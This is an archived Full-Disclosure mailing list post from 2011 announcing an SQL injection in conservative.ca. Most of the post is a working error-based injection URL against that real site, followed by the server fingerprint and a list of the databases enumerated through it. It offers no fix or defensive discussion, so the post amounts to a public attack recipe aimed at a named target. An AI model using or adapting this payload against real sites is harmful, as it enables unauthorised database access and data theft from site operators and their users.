lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 1 May 2011 13:49:43 -0400
From: m4l1c3 <malice.anon@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: conservative.ca SQL Injection
http://www.conservative.ca/index.php?section_copy_id=21257�ion_i' AND
(SELECT 3997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,108,121,58),(SELECT
(CASE WHEN (3997=3997) THEN 1 ELSE 0
END)),CHAR(58,112,119,105,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a) AND 'NHNb'='NHN
DBMS is MySQL 5.0
running Linux CentOS 5,Apache 2.2.3, PHP 5.2.12
available databases [4]:
[*] conservativ_ca_v1_6_store_v1_0
[*] conservativ_ca_v1_81
[*] information_schema
[*] test
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists